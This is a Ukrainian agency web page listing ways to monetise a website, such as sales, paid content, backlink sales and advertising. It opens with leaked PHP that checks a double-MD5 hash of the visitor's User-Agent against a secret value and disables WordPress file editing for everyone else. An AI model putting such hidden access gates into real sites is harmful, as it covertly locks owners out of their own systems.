if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Способи монетизації ресурсу у Києві, Україні за доступними цінами від агентства PATProfi

Способи монетизації ресурсу

  1. Продажі товарів та послуг. Хороший приклад сайтів, які добре продають – маркетплейси. Це торгові платформи, на яких продавці пропонують свої продукти, а покупці обирають товар та оформлюють замовлення. Таким чином, маркетплейси надають послуги посередників, просувають резидентів, за що і отримують дохід.
  2. Продаж контенту. Багато онлайн-видань пропонує підписатися на особливі матеріали або зареєструватись на сайті, щоб отримати доступ до повних версій статей. Щоб користувачі підписалися та не покидали ресурси, матеріали повинні нести певну цінність. Крім того, важливу роль відіграє репутація самого сайту або його власника.
  3. Продаж посилань. Посилання – це, по-перше, один із найголовніших факторів ранжування сайту, тому такий спосіб монетизації також має місце. Однак, щоб замовник заробляв на продажі беклінків, ресурс повинен займати стійкі позиції в ТОП, мати високі індекси цитування.

Які посилання можна продавати:

  • орендні – беклінки, що розміщуються на сайті на певний час;
  • вічні – посилання, які розміщуються на весь час існування ресурсу (вони зазвичай коштують дорожче, ніж орендні).

Звичайно, що публікація значної кількості беклінків – це ризик погіршення репутації сайту в пошукових системах або навіть потрапляння під фільтр. Щоб цього не сталося – краще розміщувати посилання в корисних матеріалах.

  1. Продаж рекламного місця. Для продажу рекламних місць необхідно розуміти, яку рекламу Ви можете запропонувати. Це допоможе визначити в якому форматі та з ким співпрацювати, щоб отримувати прибуток:
  • Пряма реклама. Сюди необхідно віднести контекстну рекламу, медійну рекламу, будь-які відеоролики, а також анімовані, статичні, інтерактивні банери та тизерні оголошення, ціль яких – продати щось. Водночас можна розміщувати рекламу як на десктопних, так і на мобільних приладах. В цьому випадку формати будуть відрізнятись.
  • Нативна реклама. Це реклама, яка вдало поєднується з основним контентом ресурсу.

В цьому випадку рекламні статті – це один з способів монетизації для контентних сайтів. Такі матеріали зазвичай розміщуються з помітками «Реклама» та «На правах реклами».

hosting.pat@gmail.com

Leave a Comment

Ваша e-mail адреса не оприлюднюватиметься.